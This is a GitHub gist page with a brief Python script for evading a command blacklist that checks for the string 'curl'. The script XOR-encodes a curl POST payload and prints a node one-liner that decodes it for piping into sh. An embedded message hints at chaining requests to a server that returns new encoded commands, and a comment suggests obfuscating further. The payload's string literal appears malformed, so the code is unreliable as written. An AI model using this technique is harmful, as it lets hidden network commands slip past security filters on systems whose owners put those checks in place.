Skip to content

Instantly share code, notes, and snippets.

What would you like to do? uses `command.includes('curl')` to blacklist curl, such a check can be bypassed by piping the output of this script into sh
from random import choices, seed
from sys import argv
payload = b'''curl -v -X POST -H 'Content-Type: application/json' -d '{command: "echo \\"place here another CURL to a server that will return a newly encoded cmd to tie the knot\\""}''''
obfuscation_key = choices(range(256), k=len(payload))
obfuscated_payload = [x ^ y for x, y in zip(payload, obfuscation_key)]
print(f"node -e 'console.log(String.fromCharCode(...{obfuscated_payload}.map((x,i)=>x^{obfuscation_key}[i])))'") # Could be obfuscated further by adding random spacing, using with something like etc.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment